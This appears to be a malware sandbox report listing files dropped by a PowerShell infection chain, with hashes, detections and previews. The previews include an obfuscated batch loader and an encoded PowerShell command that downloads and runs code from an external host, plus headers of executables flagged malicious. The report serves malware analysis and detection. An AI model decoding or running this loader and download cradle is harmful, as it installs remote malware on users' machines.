                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):481
                                                                                                      Entropy (8bit):5.355948864392777
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:/IUb4u4tmm2scxuQpN+6LO5Sfy8n6fpArZrf7Xrfz+WB:wztosZ0N+6uS68n6crzrL1B
                                                                                                      MD5:CCE2A45859A6B85674883CB540E273ED
                                                                                                      SHA1:F6B6D6448338D6C78E9FF87CBAF6639D4B9D5AE6
                                                                                                      SHA-256:50B1323F0CE2221D4837C7BBF38C894B44CBA5D6532DCAE672AAAE3164E6FC8E
                                                                                                      SHA-512:6B4B30FE6B8ECE46D918111F84A3694B5F1D476A7F85C15AFC38FD269BD2930B99D2DF1C2AB699047B1E269621BDFDA1D5013756409394918C2492EF39849E94
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Preview:@Echo off..Setlocal EnableExtensions..Setlocal EnableDelayedExpansion..cd %SystemRoot%\System32..Set /P _kjfech8_V=<"C:\_kjfech8_V\computer_kjfech8_V"..set chars=0123456789abcdefghijklmnopqrstuvwxyz..for /L %%N in (10 1 36) do (..for /F %%C in ("!chars:~%%N,1!") do (..set "_kjfech8_V=!_kjfech8_V:%%N=%%C!"..)..)..)..for /F %%F in ("!_kjfech8_V!") do (..set "_kjfech8_V=!_kjfech8_V:@=!"..)..for /F %%F in ("!_kjfech8_V!") do (..set "_kjfech8_V=!_kjfech8_V:"=!"..)..%_kjfech8_V%....
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):482
                                                                                                      Entropy (8bit):5.358829564456304
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:/IUb4u4tmm2scxuHN+6LO5Sfy8n6fpArZrf7Xrfz+WB:wztosZHN+6uS68n6crzrL1B
                                                                                                      MD5:D4050C848880A5CDD470742763B263AA
                                                                                                      SHA1:D5160D10B3F33BC541E193C19B2AF2131501E7E3
                                                                                                      SHA-256:4D914E0459F1D9C471BCC0144CF1669DAC1B014EFAADB60068D8CAADB31A0C0C
                                                                                                      SHA-512:DCD1CC9869BBF28862B1358C8E034C5DA8219E579DDA7680FEE7562A56E8A515CA3ACDA5905BD471F46CE044BBAA5B8E5444FD4CF90EBF8DFDAF90A34000B046
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Preview:@Echo off..Setlocal EnableExtensions..Setlocal EnableDelayedExpansion..cd %SystemRoot%\System32..Set /P _kjfech8_V=<"C:\_kjfech8_V\computer_kjfech8_Vy"..set chars=0123456789abcdefghijklmnopqrstuvwxyz..for /L %%N in (10 1 36) do (..for /F %%C in ("!chars:~%%N,1!") do (..set "_kjfech8_V=!_kjfech8_V:%%N=%%C!"..)..)..)..for /F %%F in ("!_kjfech8_V!") do (..set "_kjfech8_V=!_kjfech8_V:@=!"..)..for /F %%F in ("!_kjfech8_V!") do (..set "_kjfech8_V=!_kjfech8_V:"=!"..)..%_kjfech8_V%....
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49664
                                                                                                      Entropy (8bit):5.876977574715819
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:WwU7bDT2KLt6oPjQQ5fxGIjN44MgZkD9TpiPogpUORaNpohsySZlv7:WtfT2KwoPBxjN4zDbgpUOoo1SZ17
                                                                                                      MD5:85018BE1FD913656BC9FF541F017EACD
                                                                                                      SHA1:26D7407931B713E0F0FA8B872FEECDB3CF49065A
                                                                                                      SHA-256:C546E05D705FFDD5E1E18D40E2E7397F186A7C47FA5FC21F234222D057227CF5
                                                                                                      SHA-512:3E5903CF18386951C015AE23DD68A112B2F4B0968212323218C49F8413B6D508283CC6AAA929DBEAD853BD100ADC18BF497479963DAD42DFAFBEB081C9035459
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: rPO767575.cmd, Detection: malicious
                                                                                                      • Filename: KKKK.hta, Detection: malicious
                                                                                                      • Filename: ZG7UaFRPVW.exe, Detection: malicious
                                                                                                      • Filename: IN-34823_PO39276-pdf.vbe, Detection: malicious
                                                                                                      • Filename: 7XU2cRFInT.exe, Detection: malicious
                                                                                                      • Filename: megerosites.cmd, Detection: malicious
                                                                                                      • Filename: Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe, Detection: malicious
                                                                                                      • Filename: Payroll for July.exe, Detection: malicious
                                                                                                      • Filename: 2nd_Quarter_Order_Sheet_xls_0000000000000000000.exe, Detection: malicious
                                                                                                      • Filename: Import_Tax Invoice_PL_xls_0000000000000000000 .exe, Detection: malicious
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):68330000
                                                                                                      Entropy (8bit):7.999997201173071
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1572864:EQ27uOe3TzkFTMFcREDv91nY27fqMtQxMCj7920jg9pjUGpDn:hrjoFTMaWTfnjfJYt9C9JDn
                                                                                                      MD5:3AD4359325A5C5D2A33BD7D902A80075
                                                                                                      SHA1:63AA60AC67D9927C25535E967FA9D87549183F89
                                                                                                      SHA-256:1C36B918769F3C9F026D0BE59263DD16CDEDC639CCE24092AEF67A6E36D19CF8
                                                                                                      SHA-512:E33DFB7EE833D75E9DFFB8D02CD5ABBB2403553E50C5756890AE6495F89C43763850DA040F8DF6F95901E233BC5BB3ACB1BBA6655B54A9A7ADED7BBE0D7163D4
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):773968
                                                                                                      Entropy (8bit):6.901569696995594
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                                                                                      MD5:BF38660A9125935658CFA3E53FDC7D65
                                                                                                      SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                                                                                      SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                                                                                      SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: mXF65oa1GJ.exe, Detection: malicious
                                                                                                      • Filename: mXF65oa1GJ.exe, Detection: malicious
                                                                                                      • Filename: Confirm Me.exe, Detection: malicious
                                                                                                      • Filename: PInstaller.exe, Detection: malicious
                                                                                                      • Filename: 123.sfx.exe, Detection: malicious
                                                                                                      • Filename: KKKK.hta, Detection: malicious
                                                                                                      • Filename: formatfactory-4-6-1-0.exe, Detection: malicious
                                                                                                      • Filename: formatfactory-4-6-1-0.exe, Detection: malicious
                                                                                                      • Filename: EYOFFTITMDLXZJFFCCGFDTBIY.msi, Detection: malicious
                                                                                                      • Filename: SSCBOLGZFXVJMEICRNQMJOCDIF.msi, Detection: malicious
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):773968
                                                                                                      Entropy (8bit):6.901569696995594
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                                                                                      MD5:BF38660A9125935658CFA3E53FDC7D65
                                                                                                      SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                                                                                      SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                                                                                      SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):293
                                                                                                      Entropy (8bit):3.3219880145434697
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:fRnNiTwFOhT6WVhEqnXcx91PNWlDxUWP8uIl8OH/DlBMn:5nNis+hFnXoYldUPtXon
                                                                                                      MD5:F33BB3F1B71C05FC8DAA3B0908BE3DCA
                                                                                                      SHA1:933329E5A139ABB5465A9606DC70EEB3B8D09773
                                                                                                      SHA-256:EBDA232FC01D4837B77EC30597945B103B45245714A6FE6AFE0D198010F21195
                                                                                                      SHA-512:37F92A7C3D6F230FFCFE63E79D5FA4B1394B246FDCAAAB2341926A2D36C4B0EFD28EE1123E6D194EBA021EDE5ACD76ADC825C345EE17CBA3B2F542FF4142CCC0
                                                                                                      Malicious:false
                                                                                                      Preview:@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28://@15@28@23@10@29.@28@17@24@25/@10/@0@8/@1@5@0@8@2@2/@30@25/@30@25') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -..
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):293
                                                                                                      Entropy (8bit):3.3222176487027815
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:fRnNiTwFOhT6WVhEqnXcx91PNWlDxUWP82eZFl8OH/DlBMn:5nNis+hFnXoYldUP2eZhon
                                                                                                      MD5:9C2D3D09140EEEB2EFE40F876D44E1B0
                                                                                                      SHA1:D025BF465CB917BA91D8F4AF601E7AB5A0DC5103
                                                                                                      SHA-256:72B3480265246FB30775BD6C6DF814C48D07FF8A2AF3CD3BB28AC61119D88734
                                                                                                      SHA-512:7480FFCBF90D81DD1F195068F4A00E7CB96A6BB965F79519C31ED2B295011B277111DB74E6D153CAAD6D08AFF7ED3311D59D6BD5C2A670317F8F364531623C0F
                                                                                                      Malicious:false
                                                                                                      Preview:@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28://@15@28@23@10@29.@28@17@24@25/@10/@0@8/@1@5@0@8@2@2/@10@30/@10@30') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -..
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):108448
                                                                                                      Entropy (8bit):6.4314522815075446
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:iTC3F6JkULenwAFqz5pV3+Zqocv0T+EtO5pf+gMl/1:iuV66kL5pjxEtqpWRl/1
                                                                                                      MD5:61E6B94AB6109254FBEF360681F5B80D
                                                                                                      SHA1:204A5EDA5FEA33A56EDB33B9CCD40AF635A04564
                                                                                                      SHA-256:446B4D19ED8FA1563B77A7F36261B76911B208AF1D00A805D54E44B01CA3F54A
                                                                                                      SHA-512:93FAD29F13C0A18E4864DDF57AEBA882FB411B84F6DFF993B87295A1B5E4B488433802C2150FBF25A3132379DC2EB3AA02D836059B0EF24A2DB4269EB0795A9B
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):108448
                                                                                                      Entropy (8bit):6.4314522815075446
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:iTC3F6JkULenwAFqz5pV3+Zqocv0T+EtO5pf+gMl/1:iuV66kL5pjxEtqpWRl/1
                                                                                                      MD5:61E6B94AB6109254FBEF360681F5B80D
                                                                                                      SHA1:204A5EDA5FEA33A56EDB33B9CCD40AF635A04564
                                                                                                      SHA-256:446B4D19ED8FA1563B77A7F36261B76911B208AF1D00A805D54E44B01CA3F54A
                                                                                                      SHA-512:93FAD29F13C0A18E4864DDF57AEBA882FB411B84F6DFF993B87295A1B5E4B488433802C2150FBF25A3132379DC2EB3AA02D836059B0EF24A2DB4269EB0795A9B
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                      Category:dropped
                                                                                                      Size (bytes):72830057
                                                                                                      Entropy (8bit):7.999970220702098
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1572864:Rl30xbxfZOMP+N1p1rYU3SXYp9tzd3HToEXq0Jv:rkxbBZOQ6v1rYEVnhbtJv
                                                                                                      MD5:E72F7F139A00045E7A2DAF8A1C0AB730
                                                                                                      SHA1:8F1D21A21EAF6A4E312E2D15CFE4115CD9BE5AFD
                                                                                                      SHA-256:78EBE0FF32A280E98E6720E60FC1E95FBD533C3F4535D41CF790C87125556F8E
                                                                                                      SHA-512:AD31A82D34FE2604099090952ABB33DB7F9370A161227CAF1CC7C28E5083F15D5F8EEF24CF77251BCC846A43DC50D6271B29DAE83297E4147DD5DB41B44B5B65
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24278
                                                                                                      Entropy (8bit):7.992239472488486
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:MZ/cBozUqKi8DsHqjFnKNSTYY0Rez/5QLkWN6vXiAq+7UYaiaeOaIfxVh+bJ/jIW:6/vUqKFsKw0h1QL7Qvy8UYP6aIfxVgbz
                                                                                                      MD5:36B4C39FF2982F0A7D3DEDC71839AFA7
                                                                                                      SHA1:ABE9615811A42C68368C6472E520CC0AFDB74E02
                                                                                                      SHA-256:F189601651275217ACFC20A19E1D27D2AD2F9687BFD05E2D7C760EC749E93F17
                                                                                                      SHA-512:CDDD0EB6EA3F639C5853BAB86F852D1F9AC2B91053380D1F732693E12A96ED1F662833DD48993A13F11DF9809552E7F1097090CE1ADF633E8E1A3D668418C506
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24286
                                                                                                      Entropy (8bit):7.992282333476335
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:MT8/cBozUqKi8DsHqjFnKNSTYY0Rez/5QLkWN6vXiAq+7UYaiaeOaIfxVh+bJ/jW:e8/vUqKFsKw0h1QL7Qvy8UYP6aIfxVgs
                                                                                                      MD5:2F200A8033EB6129E54D5FA818A64A21
                                                                                                      SHA1:68B6D29FF5CA9B4044B130AF7FF4F8FFC7703044
                                                                                                      SHA-256:F7BAA214EC4B2B4B05ABA4AD2CB96B04EB090E8DF9D53FC395B4636661928A25
                                                                                                      SHA-512:9A1A4B444EDAE236EDCF26C2544D9A83F544D0D8F53CFD21A12132D80F0D6D18ACE5B76D907B5FD672412C5B954DF4A738A748D600EDCC0D13B2307AE3FCDA1F
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):947288
                                                                                                      Entropy (8bit):6.629681466265794
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):68330000
                                                                                                      Entropy (8bit):7.999997201173071
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1572864:EQ27uOe3TzkFTMFcREDv91nY27fqMtQxMCj7920jg9pjUGpDn:hrjoFTMaWTfnjfJYt9C9JDn
                                                                                                      MD5:3AD4359325A5C5D2A33BD7D902A80075
                                                                                                      SHA1:63AA60AC67D9927C25535E967FA9D87549183F89
                                                                                                      SHA-256:1C36B918769F3C9F026D0BE59263DD16CDEDC639CCE24092AEF67A6E36D19CF8
                                                                                                      SHA-512:E33DFB7EE833D75E9DFFB8D02CD5ABBB2403553E50C5756890AE6495F89C43763850DA040F8DF6F95901E233BC5BB3ACB1BBA6655B54A9A7ADED7BBE0D7163D4
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                      Category:dropped
                                                                                                      Size (bytes):72830057
                                                                                                      Entropy (8bit):7.999970220702098
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1572864:Rl30xbxfZOMP+N1p1rYU3SXYp9tzd3HToEXq0Jv:rkxbBZOQ6v1rYEVnhbtJv
                                                                                                      MD5:E72F7F139A00045E7A2DAF8A1C0AB730
                                                                                                      SHA1:8F1D21A21EAF6A4E312E2D15CFE4115CD9BE5AFD
                                                                                                      SHA-256:78EBE0FF32A280E98E6720E60FC1E95FBD533C3F4535D41CF790C87125556F8E
                                                                                                      SHA-512:AD31A82D34FE2604099090952ABB33DB7F9370A161227CAF1CC7C28E5083F15D5F8EEF24CF77251BCC846A43DC50D6271B29DAE83297E4147DD5DB41B44B5B65
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15936
                                                                                                      Entropy (8bit):6.475860444797363
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Gpsx5cnV21mSHhV8b+lee84SzFnYPLr7aq:GpscnfS/8KUe8jC7aq
                                                                                                      MD5:4AFCAB972E98ECBF855F915B2739F508
                                                                                                      SHA1:615DC2FA827FAB39E16A7E9721F484E7F4D34F8E
                                                                                                      SHA-256:7CC34A5423BD3FC9FA63D20EBECE4103E22E4360DF5B9CAA2B461069DAC77F4D
                                                                                                      SHA-512:58258F74D7E35C5A83234A98BC033846BE5A65146BD992E738A8678706A18C30759BD405FBB30A296181E2F92ACB0219DF8979030CC45D1CDEC6AC06E8BC00D5
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24278
                                                                                                      Entropy (8bit):7.992239472488486
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:MZ/cBozUqKi8DsHqjFnKNSTYY0Rez/5QLkWN6vXiAq+7UYaiaeOaIfxVh+bJ/jIW:6/vUqKFsKw0h1QL7Qvy8UYP6aIfxVgbz
                                                                                                      MD5:36B4C39FF2982F0A7D3DEDC71839AFA7
                                                                                                      SHA1:ABE9615811A42C68368C6472E520CC0AFDB74E02
                                                                                                      SHA-256:F189601651275217ACFC20A19E1D27D2AD2F9687BFD05E2D7C760EC749E93F17
                                                                                                      SHA-512:CDDD0EB6EA3F639C5853BAB86F852D1F9AC2B91053380D1F732693E12A96ED1F662833DD48993A13F11DF9809552E7F1097090CE1ADF633E8E1A3D668418C506
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24286
                                                                                                      Entropy (8bit):7.992282333476335
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:MT8/cBozUqKi8DsHqjFnKNSTYY0Rez/5QLkWN6vXiAq+7UYaiaeOaIfxVh+bJ/jW:e8/vUqKFsKw0h1QL7Qvy8UYP6aIfxVgs
                                                                                                      MD5:2F200A8033EB6129E54D5FA818A64A21
                                                                                                      SHA1:68B6D29FF5CA9B4044B130AF7FF4F8FFC7703044
                                                                                                      SHA-256:F7BAA214EC4B2B4B05ABA4AD2CB96B04EB090E8DF9D53FC395B4636661928A25
                                                                                                      SHA-512:9A1A4B444EDAE236EDCF26C2544D9A83F544D0D8F53CFD21A12132D80F0D6D18ACE5B76D907B5FD672412C5B954DF4A738A748D600EDCC0D13B2307AE3FCDA1F
                                                                                                      Malicious:false
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):947288
                                                                                                      Entropy (8bit):6.629681466265794
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                      MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                      SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                      SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                      SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15936
                                                                                                      Entropy (8bit):6.475860444797363
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Gpsx5cnV21mSHhV8b+lee84SzFnYPLr7aq:GpscnfS/8KUe8jC7aq
                                                                                                      MD5:4AFCAB972E98ECBF855F915B2739F508
                                                                                                      SHA1:615DC2FA827FAB39E16A7E9721F484E7F4D34F8E
                                                                                                      SHA-256:7CC34A5423BD3FC9FA63D20EBECE4103E22E4360DF5B9CAA2B461069DAC77F4D
                                                                                                      SHA-512:58258F74D7E35C5A83234A98BC033846BE5A65146BD992E738A8678706A18C30759BD405FBB30A296181E2F92ACB0219DF8979030CC45D1CDEC6AC06E8BC00D5
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L......V............................|........ ....@..........................`......Z.....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11786677
                                                                                                      Entropy (8bit):5.694433926204656
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:yyDhUpv82rzae7Cxd/qmglqhzzewpDbj85nCQRalZLCwpokCFCxJD9LKXo:PyPp7CxwqhvD0JTo
                                                                                                      MD5:C330C02F31F3ADDF099F3EF457F177C3
                                                                                                      SHA1:7410D5A5BFC9FC480CEF4B572AE8A7DA482FC211
                                                                                                      SHA-256:9352FF1DCF47CCAC6895E0C1974B38DABC58DFE9CB356A6168CCD06B5112DD08
                                                                                                      SHA-512:0946B20B5978139FF6E8FEBA29ABAB4251D890E43F46AA7C1FA07AD67371EAF23A616F109A838FD14CA57EB7BB4DD72C186D9C0DBB44627497E6123B7C37AD6A
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 19%
                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...$..g...........!................0.............@.......................................@.......................... ...........0....!..N...................@.......@$.............................................p...........`....................text...d........................... ..`.itext..H........................... ..`.data....S.......T..................@....bss....Dl...`...........................idata...0.......2...6..............@....didata.`............h..............@....edata....... .......v..............@..@.rdata..E....0.......x..............@..@.reloc.......@.......z..............@..B.rsrc....N....!..N... !.............@..@.debug...k...@$..k...n#.............@..@........................................................
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11786680
                                                                                                      Entropy (8bit):5.694435074250896
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:EyDhUpv82rzae7Cxd/qmglqhzzewpDbj85nCQRalZLCwpokCFCxJD9LKXo:NyPp7CxwqhvD0JTo
                                                                                                      MD5:3A4452621480142924BB26CC54B37FCF
                                                                                                      SHA1:137BB88AEC95275F5B618FE3334629EE70920366
                                                                                                      SHA-256:F302E18DEEAAB3F22D035E2D1EB94DD980B2E9DEB81544543FB944CF3D1DAA0A
                                                                                                      SHA-512:6FF8F2B891ABFA0F2D036BFFC9CA5069A1DB6D98C3E3C42C29F4F5F2761E076EEA4F231D2B45040EBA6F517AB5B6718EA4F4971D942ABF57D900F0096E7CD3BC
                                                                                                      Malicious:false
                                                                                                      Preview:{},MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...$..g...........!................0.............@.......................................@.......................... ...........0....!..N...................@.......@$.............................................p...........`....................text...d........................... ..`.itext..H........................... ..`.data....S.......T..................@....bss....Dl...`...........................idata...0.......2...6..............@....didata.`............h..............@....edata....... .......v..............@..@.rdata..E....0.......x..............@..@.reloc.......@.......z..............@..B.rsrc....N....!..N... !.............@..@.debug...k...@$..k...n#.............@..@.....................................................
                                                                                                      Process:C:\Windows\System32\curl.exe
                                                                                                      File Type:ASCII text, with CR, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):399
                                                                                                      Entropy (8bit):3.2243769951518737
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgc9eFJNVZNFGI5h:Vz6ykymUexb1U9cL9c9eFJNfNpT
                                                                                                      MD5:323EE4F8E6719CD748191A22C90D2571
                                                                                                      SHA1:2BEC20C3A3212599D6BC0B8E8605EF04397FF0EE
                                                                                                      SHA-256:A7D27E734B1D314C9E18043D7CA0EE809A8B090A5825ED4DAA9F4571F6B9F83F
                                                                                                      SHA-512:9E797E180CF71FE48B5BC189DB0FDA0E34AC4BA7753F83D8B65B75170EDC76C92B36B9EACBB0383FDC80C491B0C40C8D51AE7F129CA3C277EE78B60D43719994
                                                                                                      Malicious:false
